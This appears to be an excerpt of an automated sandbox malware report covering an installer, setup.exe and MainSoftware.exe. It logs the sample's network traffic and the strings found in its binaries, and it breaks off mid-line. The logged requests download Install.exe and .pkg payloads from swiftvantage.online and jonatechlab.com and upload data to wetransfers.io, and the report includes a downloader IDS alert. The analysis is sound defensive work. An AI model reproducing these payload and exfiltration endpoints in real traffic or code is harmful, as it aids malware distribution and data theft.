    Source: global trafficHTTP traffic detected: POST /tools/create HTTP/1.1Host: swiftvantage.onlineContent-Type: application/json; charset=utf-8Content-Length: 66
    Source: global trafficHTTP traffic detected: GET /tools/domains HTTP/1.1Host: swiftvantage.online
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 114
    Source: global trafficHTTP traffic detected: POST /uplo.php HTTP/1.1Host: wetransfers.ioAccept: */*Content-Length: 11232Content-Type: multipart/form-data; boundary=------------------------MSqtZT4VmzaU3zZZL5a8jB
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 533
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 114
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meAccept: */*
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: ifconfig.me
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49995 -> 172.67.183.127:443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/89b7e6dd-bc12-46a1-96dc-aded5f1cf453 HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /v.php HTTP/1.1Host: wetransfers.ioUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficHTTP traffic detected: GET /tools/domains HTTP/1.1Host: swiftvantage.online
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ifconfig.meAccept: */*
    Source: global trafficDNS traffic detected: DNS query: swiftvantage.online
    Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
    Source: global trafficDNS traffic detected: DNS query: jonatechlab.com
    Source: global trafficDNS traffic detected: DNS query: wetransfers.io
    Source: global trafficDNS traffic detected: DNS query: ifconfig.me
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: unknownHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2608319609.000000000A4C0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563437302.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571370950.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2565300514.0000000008D8F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571276052.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563437302.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571370950.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2565300514.0000000008D8F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571276052.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
    Source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: MainSoftware.exe, 00000013.00000002.2485820059.000001CEA2497000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485820059.000001CEA2445000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485820059.000001CEA247F000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2485820059.000001CEA2483000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jonatechlab.com:443/
    Source: setup.exe, 00000000.00000002.2608319609.000000000A4C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2563437302.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571370950.0000000008D90000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2565300514.0000000008D8F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2571276052.0000000008D89000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
    Source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C0000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
    Source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C0000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
    Source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C0000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB76000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: setup.exe, 00000000.00000003.1996568847.000000000CB76000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
    Source: setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096#
    Source: setup.exe, 00000006.00000002.2567845935.0000000005436000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564836011.0000000005433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096##
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1750853345.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
    Source: setup.exe, 00000000.00000003.2597657389.00000000083E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2564713821.00000000083CF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2605582020.00000000083E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAutho
    Source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1751218628.00000000083F7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2568114439.0000000005481000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928388556.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000002.2569973733.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928520911.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928720841.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1928865644.0000000005460000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.2564436089.0000000005480000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1931259294.0000000008D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 